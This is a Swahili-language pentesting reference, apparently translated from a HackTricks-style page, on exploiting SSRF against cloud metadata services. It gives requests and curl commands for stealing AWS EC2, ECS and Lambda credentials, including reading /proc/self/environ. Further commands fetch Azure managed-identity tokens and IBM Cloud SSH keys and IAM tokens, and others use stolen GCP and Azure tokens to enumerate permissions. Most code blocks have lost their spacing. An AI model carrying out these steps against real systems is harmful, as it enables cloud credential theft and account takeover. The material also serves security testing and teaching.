Endpoint ya metadata inaweza kufikiwa kutoka ndani ya mashine yoyote ya EC2 na inatoa habari muhimu kuhusu hiyo. Inapatikana kwa url: http://169.254.169.254 (habari kuhusu metadata hapa).
Kuna toleo 2 la endpoint ya metadata. La kwanza inaruhusu kufikia endpoint kupitia maombi ya GET (hivyo SSRF yoyote inaweza kuitumia). Kwa toleo la 2, IMDSv2, unahitaji kuomba tokeni kwa kutuma ombi la PUT na HTTP header kisha kutumia tokeni hiyo kufikia metadata na HTTP header nyingine (hivyo ni ngumu zaidi kuitumia na SSRF).
Tafadhali kumbuka kwamba ikiwa kifaa cha EC2 kinaimarisha IMDSv2, kulingana na nyaraka, jibu la ombi la PUT litakuwa na kikomo cha hatua 1, kufanya iwe haiwezekani kufikia metadata ya EC2 kutoka kwenye chombo ndani ya kifaa cha EC2.
Zaidi ya hayo, IMDSv2 pia itazuia maombi ya kupata tokeni ambayo yanajumuisha kichwa cha X-Forwarded-For. Hii ni ili kuzuia wakala wa kurudisha misimamo iliyopangwa vibaya kutoka kuweza kufikia hiyo.
Tambua aws_session_token, hii ni muhimu kwa wasifu kufanya kazi.
PACU inaweza kutumika na siri zilizopatikana kujua mamlaka yako na jaribu kuinua mamlaka
SSRF katika AWS ECS (Huduma ya Kontena) siri
ECS, ni kikundi la mantiki la mifano ya EC2 ambayo unaweza kukimbia programu bila kuhitaji kupanua miundombinu yako ya usimamizi wa kikundi kwa sababu ECS inasimamia hilo kwa niaba yako. Ikiwa unafanikiwa kudhoofisha huduma inayofanya kazi katika ECS, vifaa vya metadata vinabadilika.
Ikiwa unafikia http://169.254.170.2/v2/credentials/<GUID> utapata siri za mashine ya ECS. Lakini kwanza unahitaji kupata <GUID>. Ili kupata <GUID> unahitaji kusoma variable ya environAWS_CONTAINER_CREDENTIALS_RELATIVE_URI ndani ya mashine.
Unaweza kuisoma kwa kutumia Path Traversal kwa file:///proc/self/environ
Anwani ya http iliyotajwa inapaswa kukupa AccessKey, SecretKey na token.
Tafadhali elewa kwamba katika baadhi ya kesi unaweza kupata ufikiaji wa taarifa ya EC2 metadata instance kutoka kwenye kontena (angalia vikwazo vya IMDSv2 TTL vilivyotajwa hapo awali). Katika hali hizi kutoka kwenye kontena unaweza kupata ufikiaji wa jukumu la IAM la kontena na jukumu la IAM la EC2.
SSRF kwa AWS Lambda
Katika kesi hii vyeti vimehifadhiwa kwenye mazingira ya env. Kwa hivyo, ili kuzipata unahitaji kupata kitu kama file:///proc/self/environ.
Jina la mazingira ya env yanayovutia ni:
AWS_SESSION_TOKEN
AWS_SECRET_ACCESS_KEY
AWS_ACCES_KEY_ID
Zaidi ya hayo, mbali na vyeti vya IAM, Lambda functions pia zina data ya tukio inayopitishwa kwa kazi wakati inapoanzishwa. Data hii inapatikana kwa kazi kupitia interface ya runtime na inaweza kuwa na taarifa nyeti (kama vile ndani ya stageVariables). Tofauti na vyeti vya IAM, data hii inapatikana kupitia SSRF ya kawaida kwa http://localhost:9001/2018-06-01/runtime/invocation/next.
Tafadhali elewa kwamba vyeti vya lambda vimo ndani ya mazingira ya env. Kwa hivyo, ikiwa mnyororo wa kufuatilia wa nambari ya lambda unachapisha mazingira ya env, inawezekana kuzipata kwa kusababisha kosa katika programu.
Ili kutumia tokeni ya akaunti ya huduma iliyochotwa unaweza tu kufanya:
# Via env varsexport CLOUDSDK_AUTH_ACCESS_TOKEN=<token>gcloudprojectslist# Via setupecho"<token>">/some/path/to/tokengcloudconfigsetauth/access_token_file/some/path/to/tokengcloudprojectslistgcloudconfigunsetauth/access_token_file
# Check for those env vars to know if you are in an Azure appecho $IDENTITY_HEADERecho $IDENTITY_ENDPOINT# You should also be able to find the folder:ls/opt/microsoft#and the filels/opt/microsoft/msodbcsql17# Get management tokencurl"$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01"-Hsecret:$IDENTITY_HEADER# Get graph tokencurl"$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01"-Hsecret:$IDENTITY_HEADER# API# Get SubscriptionsURL="https://management.azure.com/subscriptions?api-version=2020-01-01"curl-H"Authorization: $TOKEN""$URL"# Get current permission on resources in the subscriptionURL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01'"curl-H"Authorization: $TOKEN""$URL"# Get permissions in a VMURL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl-H"Authorization: $TOKEN""$URL"
# API request in powershell to management endpoint$Token ='eyJ0eX..'$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'$RequestParams =@{Method ='GET'Uri = $URIHeaders =@{'Authorization'="Bearer $Token"}}(Invoke-RestMethod @RequestParams).value# API request to graph endpoint (get enterprise applications)$Token ='eyJ0eX..'$URI ='https://graph.microsoft.com/v1.0/applications'$RequestParams =@{Method ='GET'Uri = $URIHeaders =@{'Authorization'="Bearer $Token"}}(Invoke-RestMethod @RequestParams).value# Using AzureAD Powershell module witho both management and graph tokens$token ='eyJ0e..'$graphaccesstoken ='eyJ0eX..'Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
# Try to get current perms over resourcesGet-AzResource## The following error means that the user doesn't have permissions over any resourceGet-AzResource : 'this.Client.SubscriptionId' cannot be null.At line:1 char:1+Get-AzResource+ ~~~~~~~~~~~~~~+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException+ FullyQualifiedErrorId :Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
IBM Cloud
Tafadhali kumbuka kwamba kwa chaguo-msingi IBM metadata haijaanzishwa, hivyo huenda usiweze kuipata hata kama uko ndani ya IBM cloud VM
export instance_identity_token=`curl-s-XPUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\-H "Metadata-Flavor: ibm"\-H "Accept: application/json"\-d '{"expires_in": 3600}' |jq-r '(.access_token)'`# Get instance detailscurl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys infocurl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user datacurl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groupscurl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentialscurl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
Nyaraka kwa huduma za metadata za majukwaa mbalimbali zimeelezwa hapa chini, zikionyesha njia ambazo maelezo ya usanidi na uendeshaji kwa ajili ya mifano yanaweza kupatikana. Kila jukwaa lina vituo vya pekee vya kupata huduma zake za metadata.